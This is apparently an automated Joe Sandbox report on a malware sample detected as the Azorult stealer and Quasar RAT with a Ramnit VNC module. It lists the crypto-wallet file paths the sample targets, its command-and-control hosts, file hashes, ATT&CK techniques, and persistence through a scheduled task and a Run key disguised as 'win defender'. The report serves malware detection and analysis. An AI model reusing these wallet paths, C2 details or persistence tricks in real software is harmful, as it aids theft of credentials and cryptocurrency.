Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: SetProgmanWindow
Source: C:\Windows\System32\svchost.exe | Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ACEA96 cpuid
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004065F0 GetUserNameW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

                      Stealing of Sensitive Information:

                      Yara detected Azorult Info Stealer
                      Source: Yara match; File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Yara detected Quasar RAT
                      Source: Yara match; File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match; File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match; File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
                      Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
                      Source: Yara match; File source: dropped/windef.exe, type: DROPPED
                      Source: Yara match; File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Yara detected Azorult
                      Source: Yara match; File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Detected AZORult Info Stealer
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exe; Code function: 7_2_004186C4
                      Yara detected Ramnit VNC Module
                      Source: Yara match; File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match, File source: dropped/vnc.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: electrum.dat
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: Coins\Exodus
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, String found in binary or memory: Coins\Ethereum
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected Quasar RAT
                      Source: Yara match, File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match, File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
                      Source: Yara match, File source: dropped/windef.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Yara detected Ramnit VNC Module
                      Source: Yara match, File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match, File source: dropped/vnc.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Contains VNC / remote desktop functionality (version string found)
                      Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, String found in binary or memory: RFB 003.008
                      Source: vnc.exe, String found in binary or memory: RFB 003.008
                      Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, String found in binary or memory: RFB 003.008
                      Source: svchost.exe, String found in binary or memory: RFB 003.008
                      Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, String found in binary or memory: RFB 003.008
                      Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, String found in binary or memory: RFB 003.008

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Replication Through Removable Media 1 | Native API 11 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 1 | Input Capture 21 | System Time Discovery 1 | Remote Desktop Protocol 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
                      Default Accounts | Scheduled Task/Job 1 | Create Account 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Peripheral Device Discovery 11 | Replication Through Removable Media 1 | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Scheduled Task/Job 1 | Process Injection 612 | Obfuscated Files or Information 21 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Input Capture 21 | Automated Exfiltration | Non-Standard Port 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Registry Run Keys / Startup Folder 1 | Scheduled Task/Job 1 | Software Packing 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Clipboard Data 2 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap |  | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 1 | Masquerading 11 | LSA Secrets | System Information Discovery 35 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 3 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 14 | Jamming or Denial of Service |  | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 612 | DCSync | Security Software Discovery 131 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Virtualization/Sandbox Evasion 21 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Application Window Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
                      Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
                      Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery
                      Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Masquerade Task or Service | GUI Input Capture | System Network Configuration Discovery 1 | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy |  |  | Defacement

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 492794; Sample: CVbJSUXraQ; Start date: 29/09/2021; Architecture: WINDOWS; Score: 100

• Start: contacts ip-api.com; signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 17 other signatures. Starts CVbJSUXraQ.exe and SystemPropertiesPerformance.exe.
• CVbJSUXraQ.exe: drops C:\Users\...\SystemPropertiesPerformance.exe (PE32); signatures: Detected AZORult Info Stealer; Binary is likely a compiled AutoIt script file; Contains functionality to inject code into remote processes; Uses schtasks.exe or at.exe to add and modify task schedules. Starts vnc.exe, windef.exe, CVbJSUXraQ.exe and schtasks.exe.
• SystemPropertiesPerformance.exe: drops C:\Users\user\AppData\Local\Temp\windef.exe (PE32) and C:\Users\user\AppData\Local\Temp\vnc.exe (PE32); signatures: Antivirus detection for dropped file; Injects a PE file into a foreign processes.
• vnc.exe: signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures. Starts svchost.exe.
• windef.exe: contacts ip-api.com (208.95.112.1, ports 49744, 49746, 80; TUT-ASUS, United States); drops C:\Users\user\AppData\Roaming\...\winsock.exe (PE32); signatures: May check the online IP address of the machine; Hides that the sample has been downloaded from the Internet (zone.identifier).
• CVbJSUXraQ.exe (child process): contacts 0x21.in (50.17.5.224, ports 49743, 8000; AMAZON-AESUS, United States).
• schtasks.exe: starts conhost.exe.
• svchost.exe: contacts 5.8.88.191 (ports 443, 49747, 8080; KOMETA-ASRU, Russian Federation).

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
CVbJSUXraQ.exe | 74% | Virustotal | -
CVbJSUXraQ.exe | 69% | Metadefender | -
CVbJSUXraQ.exe | 87% | ReversingLabs | Win32.Trojan.Pwsx
CVbJSUXraQ.exe | 100% | Avira | TR/Spy.Agent.zgvfh
CVbJSUXraQ.exe | 100% | Avira | TR/AutoIt.tyemd

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\windef.exe | 100% | Avira | TR/AD.Xiclog.nmpoi
C:\Users\user\btpanui\SystemPropertiesPerformance.exe | 100% | Avira | TR/Spy.Agent.zgvfh
C:\Users\user\btpanui\SystemPropertiesPerformance.exe | 100% | Avira | TR/AutoIt.tyemd
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 100% | Avira | TR/AD.Xiclog.nmpoi
C:\Users\user\AppData\Local\Temp\vnc.exe | 100% | Avira | TR/Hijacker.W
C:\Users\user\AppData\Local\Temp\windef.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\vnc.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\vnc.exe | 84% | Virustotal | -
C:\Users\user\AppData\Local\Temp\vnc.exe | 93% | ReversingLabs | Win32.Trojan.Carberp
C:\Users\user\AppData\Local\Temp\windef.exe | 86% | Virustotal | -
C:\Users\user\AppData\Local\Temp\windef.exe | 93% | ReversingLabs | ByteCode-MSIL.Backdoor.QuasarRAT
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | 93% | ReversingLabs | ByteCode-MSIL.Backdoor.QuasarRAT

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.0.svchost.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1122256
5.0.svchost.exe.c60000.3.unpack | 100% | Avira | HEUR/AGEN.1122256
7.2.CVbJSUXraQ.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/Hijacker.W
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
5.2.svchost.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1122256
6.0.windef.exe.f10000.0.unpack | 100% | Avira | HEUR/AGEN.1135947
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/Hijacker.W
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
4.0.vnc.exe.ab0000.0.unpack | 100% | Avira | TR/Hijacker.Gen
7.2.CVbJSUXraQ.exe.db0000.1.unpack | 100% | Avira | TR/Hijacker.W
7.2.CVbJSUXraQ.exe.db0000.1.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
4.2.vnc.exe.ab0000.0.unpack | 100% | Avira | TR/Hijacker.Gen
7.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
7.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
1.3.CVbJSUXraQ.exe.3800000.6.unpack | 100% | Avira | TR/AD.MoksSteal.elw
5.0.svchost.exe.c60000.6.unpack | 100% | Avira | HEUR/AGEN.1122256
1.2.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
1.2.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
1.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/Hijacker.W
1.0.CVbJSUXraQ.exe.db0000.0.unpack | 100% | Avira | TR/AD.Xiclog.nmpoi
6.2.windef.exe.f10000.0.unpack | 100% | Avira | HEUR/AGEN.1135947
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack | 100% | Avira | TR/AD.MoksSteal.elw

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://0x21.in:8000/_az/ | 6% | Virustotal | -
http://0x21.in:8000/_az/ | 0% | Avira URL Cloud | safe
http://ip-api.com40l | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://dotbit.me/a/ | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
0x21.in | 50.17.5.224 | true | false | - | high
ip-api.com | 208.95.112.1 | true | false | - | high

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://0x21.in:8000/_az/ | true | Virustotal: 6%; Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | false | - | high

                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | windef.exe | false | - | high
http://freegeoip.net/xml/ | CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | false | - | high
http://ip-api.com40l | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.datacontract.org/2004/07/ | windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | - | high
http://api.ipify.org/3 | CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | false | - | high
http://ip-api.com/json | CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | false | - | high
http://ip-api.com | windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | false | - | high
https://dotbit.me/a/ | CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
5.8.88.191 | unknown | Russian Federation | 56541 | KOMETA-ASRU | false
50.17.5.224 | 0x21.in | United States | 14618 | AMAZON-AESUS | false

                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 492794
Start date: 29.09.2021
Start time: 01:34:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 38s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: CVbJSUXraQ (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@33/5@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 40.2% (good quality ratio 33.8%)
• Quality average: 65.5%
• Quality standard deviation: 37.8%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.54.113.53, 184.24.20.248, 40.127.240.158, 20.50.102.62
• Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
01:36:08 | Task Scheduler | Run new task: RtkAudioService64 path: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
01:36:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"
01:36:14 | Task Scheduler | Run new task: win defender run path: C:\Users\user\AppData\Local\Temp\windef.exe
01:36:14 | API Interceptor | 1x Sleep call for process: windef.exe modified
01:36:21 | API Interceptor | 549x Sleep call for process: winsock.exe modified
01:36:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log
Process: C:\Users\user\AppData\Local\Temp\windef.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1557
Entropy (8bit): 5.351891643737667
Encrypted: false
SSDEEP: 48:MIHK5HKXE1qHiYHKhQnoNHmHKBfHKntHoxHhAHKzvQTH3:Pq5qXEwCYqhQnoNGqNqntIxHeqzcX
MD5: E9163F5673A58133809F22228C6E27DD
SHA1: 236F6A2107AA2EA3092C50A94B72064FA435D4A9
SHA-256: EA9B7A740D92C4113B89E33D9DBB0187CBBF36F2587AA5139421FDBC985EE53D
SHA-512: F3124F6846C4730E04EE36698A88E966AEBBF6F7FCCD0C265A8BE183ADF6C641944B7FA35F0F320F65A36335697D55B44BD34B3494B228737FD63C80151229FF
Malicious: false
Reputation: unknown
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, Publi
C:\Users\user\AppData\Local\Temp\vnc.exe
Process: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 0
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 6144:k6laOx87Xnl7xKK3iDgExiOP+MrRmD+PQXhEHlIxJKqM01FloHJh7GIA4hVvi:k6YmenBMKSUlm+4arHlgJNGIA4hVvi
MD5: B8BA87EE4C3FC085A2FED0D839AADCE1
SHA1: B3A2E3256406330E8B1779199BB2B9865122D766
SHA-256: 4E8A99CD33C9E5C747A3CE8F1A3E17824846F4A8F7CB0631AEBD0815DB2CE3A4
SHA-512: 7A775A12CD5BCD182D64BE0D31F800B456CA6D1B531189CEA9C72E1940871CFE92CCD005938F67BFA4784AE44C54B3A7EA29A5BB59766E98C78BF53B680F2AB2
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
• Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 84%
• Antivirus: ReversingLabs, Detection: 93%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\windef.exe
Process: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 0
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5: B4A202E03D4135484D0E730173ABCC72
SHA1: 01B30014545EA526C15A60931D676F9392EA0C70
SHA-256: 7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512: 632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious: true
Yara Hits:
• Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
• Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
• Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
• Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
